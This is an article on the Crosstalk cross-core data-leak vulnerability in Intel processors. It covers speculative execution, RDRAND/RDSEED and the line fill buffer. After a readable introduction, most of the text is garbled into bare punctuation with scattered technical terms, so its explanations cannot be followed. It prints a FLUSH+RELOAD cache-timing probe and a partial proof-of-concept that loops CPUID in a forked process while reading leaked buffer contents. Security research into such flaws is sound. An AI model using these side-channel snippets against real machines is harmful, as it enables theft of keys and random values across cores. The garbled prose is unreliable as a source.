Crosstalk vulnerability

In recent years, a large number of reports have appeared about all kinds of vulnerabilities in Intel processors. The most famous of them are Spectre and Meltdown, which are based on errors in the implementation of speculative instruction execution. In June 2020, a report appeared about a new vulnerability called Crosstalk.

Unlike the aforementioned vulnerabilities, Crosstalk leaks data from one core to another. Thus, mitigations designed to stop speculative execution leaks within a single core cannot protect against Crosstalk. To understand the essence of this type of data leak, you need to know what speculative instruction execution is, how the processor pipeline works, and how data is transferred between cores. Let us briefly touch upon each of these topics.

Speculative computing

Speculative execution of instructions is one of the hardware methods a processor uses to detect parallelism at the instruction level. Calculations are carried out simultaneously for several possible paths of program execution. The simplest example is the speculative evaluation of both outcomes of a conditional branch.

Pipeline

, , . , . , , . 16 . , 8 .

?

x86 . , . Vrije Universiteit Amsterdam , . , - MDS (Model-Specific-Registers) RDMSR WRMSR. . userspace CPUID, RDRAND RDSEED.

, DRNG , bootguard . Crosstalk , , , RDRAND RDSEED.

RDRAND RDSEED

RDRAND , digital random number generator (DRNG), . DRNG , . RDSEED , .. RNG.

, RIDL, , : Line Fill Buffer, Load Ports, Store Buffer.

Line Fill Buffer (LFB) L1 Cache ( ) - L1 Cache. , , , LFB . . LFB.

Store Buffer .

Load Ports I/O . , Load Ports .

Crosstalk

Crosstalk . , . , , , LFB, , . . , . , , , .

FLUSH + RELOAD

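static inline int probe(char *adrs) {
  volatile unsigned long time;

  /* Time a single load from adrs, then flush the line for the next round. */
  __asm__ __volatile__ (
    "  mfence             \n"  /* wait for earlier loads and stores */
    "  lfence             \n"
    "  rdtsc              \n"  /* start timestamp (low 32 bits in eax) */
    "  lfence             \n"
    "  movl %%eax, %%esi  \n"  /* save the start timestamp */
    "  movl (%1), %%eax   \n"  /* the timed load */
    "  lfence             \n"
    "  rdtsc              \n"  /* end timestamp */
    "  subl %%esi, %%eax  \n"  /* eax = elapsed cycles */
    "  clflush 0(%1)      \n"  /* evict the line from the cache again */
    : "=a" (time)
    : "c" (adrs)
    :  "%esi", "%edx");
  return time;
}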

RIDL LFB, . FLUSH + RELOAD, ( ) FLUSH, , . - . , LFB. ( load), pagefault. , , LFB. , FLUSH + RELOAD. , . , , , . - , LFB.

CPUID

pid_t pid = fork();
if (pid == 0) {
    while (1)
        asm volatile(
            "mov %0, %%eax\n"
            "cpuid\n"
            ::"r"(CPUID_LEAF):"eax","ebx","ecx","edx");
}

for(size_t offset = BEGIN_OFFSET; offset < BEGIN_OFFSET + 4; ++offset) {
    // ...
    for(size_t i(0); i < ITERS; ++i) {
        flush(reloadbuffer);
        tsx_leak_read_normal(leak + offset, reloadbuffer);
        reload(reloadbuffer, results);
    }
}

, CPUID. . MDS. RIDL. . , . FLUSH + RELOAD , . , CPUID 4 , CROSSTALK. , CROSSTALK

. RDSEED. , RDSEED 0, . RDSEED . , , RDRAND RDSEED, - RDSEED. , . , . , , FLUSH + RELOAD.

, , , . , CPUID, . , RDRAND RDSEED , . , LFB. MDS , (hyperthread), , .

, . , , . , , . , , , RDRAND, RDSEED EGETKEY. , , , .

Crosstalk , , . MDS ( , ). , , - . , , . , , MDS.



